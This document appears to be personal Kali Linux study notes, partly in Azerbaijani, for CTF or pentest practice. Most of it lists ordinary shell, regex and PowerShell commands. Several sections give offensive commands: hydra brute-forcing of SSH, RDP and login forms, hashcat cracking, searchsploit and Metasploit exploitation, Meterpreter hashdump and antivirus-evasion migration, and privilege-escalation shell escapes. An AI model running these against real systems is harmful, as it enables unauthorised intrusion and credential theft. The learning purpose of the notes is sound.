~/home/kali.

/ - Root

(Ayrı qovluqdu)~ =kali

Us: kali Pass: ejgfb5

Linux cmds
Ctrl+Shift+ “++” -Böyüt şrifti
Sol Cntrl L * Clear everything clear *Sil

Undo full screen- Right Ctrl+F

git clone “https path” *Download from GitHub

sudo ./filepath *Run the executable files or scripts

apt-get update.. * Update Linux. apt-get install.. *İnstall program

whoami * Current username

display * Display images (install imagemagick)

Dirbuster *Brute force directories and files in URL

cd /usr/share/wordlists; hydra -l test -P fasttrack.txt rdp://ip address

xdg-open file *Open image from the terminal

ls * List folders +Directory= list the content

date* exit* Terminal

pwd * Print working directory(olduğun qovluq)

ip addr * Show IP.

cd .. * Change directory (arxa qovluğa qayıdır)

cd * Go Home directory

Tab * Cmd tamamlayan

nl *Number lines

touch. *Create File ; mkdir * Make directory;

rmdir * Remove directory

ls -la * Long list all(qabaqda "." olanlar ls-də görünməyən filelerdır)

man Ls * Cmdlara manual help baxmaq;ls --help

ssh username@yourIP -p 2222 *Remote control for port 2222

echo Hi > test.txt * Filea 'hi' yazır. ""no need

>> Bir dənədən fərqli olaraq Replace eləmir

rm * Remove file, +) Dir/File

cp +file+Dir. destination qoy *Copy file

cp -r *dest+ source dir. Copy dir to another

cat file1>>file2 *Copy files without overwrite

mv * Move,Rename file,dir + directory

Ex: mv old_name new_name

Up arrow * Previous cmds

passwd * Change password

sudo passwd user1 - change other user pswd

-1 * List content on 1 column

-r * Display in Reverse order

-l *Long list (+File SIZE,Access{-l -h}human frm)

-d * Show directory content

-s * Sort directory content by Size

-p *parent directory

cat * Fayl açmaq(.txt) E: cat dir8/file.txt

mousepad = cat *But in a GUI

tar -xvf *Open .tar files

-r * Recursive E: cp -r İçindəki kontenti də copy

&& - Execute 2nd command yanbayan

& - Lets cmd run in the background if take long

unzip file.zip -d mydirec *unzip file and move to mydirec directory

bzip2 * +dir Compress directory to .bz2

find -name *.txt- file, dir tapmaq(* yeri adı yaz)

(e)grep "word"- +file.txt *Fileda söz tap(not dir.)

Square bracket-RANGE: m[a-d]m, m[a,s,d]m

Curly bracket-; mkdir {folder1,folder2}

mkdir dir{1..100} *100 qovluq yarat

mkdir -p dir4/dir5 in *-p in case no parent dir.

rm -r dir{1..100} *100 dir sil

rmdir *remove empty directory(error if not emp)

rm -r *directory və içindəkilər; mkdir dir1/FM

sudo su -l name *Switch user to root

man ls; ls --help *sonrakıları göstər

file +name * Type of the file

su -l (login) *+user, switch user(old user home dir.ində qalmır)

/etc - directory where OS files are located

/var -Frequently accessed variable data:tmp,log files,backups

/tmp * Temporary directory;Qaralama;Restartda gedir

/etc/shadow – Encrypted user Passwords directory

/etc/passwd *Show users and shells

/etc/group * Show groups

1)python3 -m http.server 8000 *Start a webserver in an empty port

2)wget http://ipUrl:8000/file.txt -P /tmp/ *Download files from web to tmp dir to avoid sudo if we are
in root

3)chmod +x file.sh *Make script files executable

wc -w *word -l *lines -c *bytes count

nano filename * Edit text file or Create a file

ctrl = "^" in text editor

Local to Remote(Src to dstn) Secure Copy-

scp filename user@ip:/filelocation/newname

Remote to local-

scp user@ip:filelocation newname

kill (PID number) *kill command

Q=exit. PID=0 System boot

systemctl start(stop,enable,dis..) servicename

Ex: echo "hi tim" &=Ctrl+Z *Run in the background(e:copy)

fg *back to Foreground

crontab -e *Edit schedule

/var/log *Logs; ufw-firewall logs;fail- bruteforce

access and error logs inside */var/log/apache2

less *Ekranda hər şeyi yox, lazım olanı göstərir

add-apt-repository /etc/apt OS repositories

wget -qO -url | sudo apt-key add -

touch fl+ add to the fl; apt update; apt install fl

[a-c]zz * azz, bzz, czz; [a-cx-z]zz *azz,bzz,czz,xzz,yzz,zzz

[a-zA-Z] ; file [1-3]; [^k]ing *exclude “k”. ring not king

[^a-c] NOT -bat,cat; but fat, hat is okay

[abc] -abc,cba,ca

. *Any Single character “.at” -cat, fat, hat, rat

'\’ +char *Escape char. For literal dot FE: a\.c = a.c
? * Optional character : abc? – ab or abc. ‘c’ is optional

* Zero or more times: cats*= cat,catsss; a*f= acf,awerf

+ *One or more times kali + = kali tools

Grep -E ‘e+' red.txt red,reef,reeed

\d *Digit \D *Non-Digit

\w *Alphanumeric: a, 3 etc. \W *Non-alpha : !, #

\s *Whitespace (space,newline). \S *Alpha+ Symbols

{12} * 12 times. {1,5} *1 to 5 times. {2,} *2 or more

^ *Starts with(not in [^exclude]) $ *Ends with

^abc *Starts with abc. xyz$ *Ends with xyz

^a.*r$ *Starts with ‘a’ ends with ‘r’

^...$ *3 hərfli

During the (day|night) - ~the day or ~ the night

updatedb *Update database if new doesn’t come up

chmod +rwx *+File Change Permission on the file

chmod 777 *Everybody full permission (owner,group member,user)

sudo useradd -g blue -G purple -s /bin/bash ME

sudo adduser(useradd,addgroup) name *Adds user

sudo userdel john

grep ‘sudo’ /etc/group *See users in the “sudo” group & who can use sudo

du -ah /home/ * Disk usage- list folders in size (-a= all files)

du -c *Total size folders. du –time *Last modified

egrep = grep -e *Mention multiple patterns *include regex in string””

grep -F = fgrep *Search Fixed meaning not regex

grep *Search basic and fixed. egrep *Extended regex

grep -v *Not containing the pattern. -R *Recursive+files

grep -i *Search pattern while IGNORING the CASE

tr -s (translate;squeeze) *REPLACE the REPEATED source CHARACTER(not Word) SETS with destination
set. Ex: cat file.txt | tr -s '[a-z] '[A-Z] *kiçik hərfləri böyüyə keçirtdi. tr -s ' ' *Delete EXTRA spaces

tr -d '+set' *Delete Source set Characters

tr-d ‘character’ <file.txt>newfile.txt *Sözü silib yeni fayl

[:digit:] *Rəqəmləri seç

[a-zA-Z] *Bütün hərfləri seç

awk ‘{print}' = cat awk '/ctf/' file.txt *Search “ctf”

awk '{print $1,$3}' file.txt *Hər sətirdəki 1,3cü sözü Cat

awk '{print NR,$0}' file.txt *Number(records) the lines

$0 =All line. Fields- hər field seperatordan öncə və sonra

awk ‘BEGIN{FS=”o”} {print $1,$3} END{print “TOTAL ROWS= “ NR}' file.txt *Field seperatoru “o” hərfi
nəzərə alaraq 1və 3üncü fieldləri + sonda ümumi sıra sayını listele

sort *Sort alphabetically sort -n -r *Numerically; Reversely(Böyük ədəddən Kiçiyə)

sort -o save.txt *Save into a output file

uniq *Unique olanları göstərir(eliminate duplicate lines(only neighbours not uzaq).

Sort | uniq *Sort alphabetically then eliminate duplicates

uniq -c *Count the occurrence of each line in file

uniq -d *Show repeated ones uniq -u *Show only unique lines

head -n 2271 sort.txt *Filedakı 2271ci line-ı göstərir axırıncı

cut -d “:” -f 1 *Delimiter is colon, and we Take the first field(for brute force in /etc/passwd)

cat -n *Nömrələ lineları

env *Show variables and Path which may have a script language

ifconfig *Show network interfaces, ip etc.

netstat -at or au * List connections, tcp or udp protocols. netstat -s *Statistics

pdfinfo doc.pdf *Get info about pdf(author etc, time etc)

sudo apt install poppler-utils *Install the upper cmd to kali

exiftool image.jpg * Gps, Camera model (replace deg with '°’ paste in google or bing maps)

sudo apt install libimage-exiftool-perl *Install the upper cmd

ftp (ip address) * Connect to open ftp port

get file (+ new name u want) *Download from the open ftp server

sha256sum file – Make sha256 hash of the file

md5sum file - Make hash

echo “code” | base64 -d. *Decode base64

sudo su - Convert to root

find / -iname “filename” 2>dev/null *Find path to file from the root(ignore case), Don’t specify path

find . -name flag.txt *Find the file in current dir.

Find / -type f -perm 0777 * Find files with 777 permissions (-type d *directory)

Find / -size +100M. *Find files +100 mb

Cat /etc/issue *See linux version cat /proc /version *Target system process

netdiscover -r *Find ip addresses

hashcat -O -m 20 --show salted hash /usr/share/wordlists/rockyou.txt *Optimize for kernel, -m Choose

the hash version number(check hashcat help) and show cracked password

gobuster dir -u 10.10.. -w wordlist/path

hydra -l username -P passwordlist/path -t 6 (ip)10.10. ssh (or- ftp://ip) *Brute force ssh password
hydra -l username -P rockyou.txt ip.address(slashsiz) http-post-form
“/login:user=^USER^&pass=^PASS^:invalid” *Use hydra for login Pages

crunch 7 9 (min-max word length) abc6543(strings to use) * Make wordlist

Nmap

nmap -F -A -sN -T4 -sC (ip address..) *Scan for open ports Fast(known ports) and All including Versions(-
sV), scan network and then provide ip, Default scan(-sC)

nmap -sV -vv -sC –script vuln -sS *Version scan, Verbose, Script scan for finding vulnerability, Syn scan(-
sS stealthy one for evasion)

İf port 80(http) or 443(https) is open then means there’s a web server running, mostly website hosting
under different /(slash)s

Check for web application versions under websites

Searchsploit (Exploit database)

searchsploit --cve 2019-9053 (ornamexploit) *Search for the exploit from exploit-db

searchsploit -m file path *To download(mirror) exploit to your machine

python3 /usr/share/exploitdb/exploits/(searchsploit file location) http://..:port/ *Exploit

Metasploit (after nmap and gobuster)

Msfconsole *Start Metasploit

search (name) *Search the name of the vulnerability from nmap

use (number) *Select the exploit

back *To exit from the wrong exploit

show options *See what’s required or not

set (RHOSTS) ip *Set the required value

Ctrl Z or background *Background the session

Search shell_to meterpreter and Use 0. + show options

set session id + sessions

session (-i) id *Choose the meterpreter session to convert + run

Meterpreter: 1)getsystem *check to confirm u escalated, 2)shell *open dos shell,show file path for
Windows or any OS 3)whoami, 4)(afterCtrlZ) ps 5)migrate Pidnumber *Migrate to Authority System
processes to evade antivirus, pri.escalation etc. 6) hashdump * Extract password hashes from
Windows(migrate to other sys process if not work)

(1) search -f file(path copy paste eliyəndə 2 //li elə tab-la, manual bir yox) 2)? *Help 4)dir *Listele for
windows 5)type=more *See the content cat 7)getuid *See privileges 9) sessions -i idnumber *Get back
to session 10) cat “pathtofile” *Use dırnaqs for windows path in linux 11) sysinfo -comp,os name 12)pwd
13) cd ../../ 14)

Privilege Escalation

Use linux exploit suggester

Sudo vim -c ‘:!/bin/sh’. *Change to vim editor command shell; in VIM Press “Esc” to back to normal.
And Press “:!cmd” to execute cmds

Sudo -l *See your privileges ; Also try to check other users in home directory

Go to gtfobins.github.io and look for the binaries u can escalate after sudo -l

find / -perm -4000 2>/dev/null *Find files that have suid permission & removeerror(2>device/null)

Enumeration:

Hostname *Check the name of machine(usually OS version)

Uname -a *info about kernel

Ps -axjf *View process tree

Ps aux * All users processes and who launched it

Ps aux | grep -v tty *Don’t show the process attached to terminal in other words show background
processes

Id *+name Show özünün ya da başqasının hansı grupa vı user idsi. Root olub olmadığını da check

History * See history

gedit local.rules * Edit Snort rules

sudo snort -X(similar -dev)(read snort. Files as raw data-hex+ascii, specify -r or -c together) -d(logger
mode-output all packets) -A full(create alerts) -c(specify rules) -r (read pcaps,snorts) -T(test config
rules,specify -c) -l . (output to the current directory)

IPS mode: sudo snort -c file -q -Q –daq afpacket -i eth0:eth1 -A full

sudo snort -r snort.log ‘port 22’ - Filter port 22 in snort file

etc/snort/rules/local.rules

tail |head file *Extract the last |first 10 lines from the file

route=ip -r *See the routing table(and who are you on the network with by slash)

ip -a *See your ips on the network

iwconfig *See wireless

service apache2 start *Start an apache server

Bettercap:

1st cmd : bettercap

net.probe on *Scan devices on the network. net.show *See devicesğ

CMD:
ipconfig /? *See Help Manual

cls *Clean screen

net user (username) *See users. Their groups and last logon for ( )

color 2,3,4 dir/s

arp -a *See the ip and macs accordingly on the same network

Powershell: (Verb-Noun)
Cd C:\

Get-Command; Get-alias(different) *See cmdlets

Get-Command Verb-* or Get-Command *-Noun(regex)

Get-Help command-name *Get help

Get-Service |Where-Object -Property Status -eq Stopped *Get Processes equal to stopped

ls -Path C:/ -Include *file.txt* -File -R -ErrorAction Silently Continue * Find files(not directory)

Get-Content “C:\..” *Cat files

Get-Filehash -Algorithm md5 FİLEPATH

Get-Childitem | Select Object -Property Mode,Name

set-location c:\ = cd\ *C diskinə aparır;

Get-childitem = dir=ls *listlə

Set-childitem. *cd kimi change directory

Get-location *pwd olduğun directory

Copy-item *cp

New-item filename.txt * Create a file

echo "smth"

Remove item=rm=rmdir=del=rd

clear = cls *sil

notepad, calc- calculator, mspaint,

ipconfig /all

Get-Help(Command) *resolve*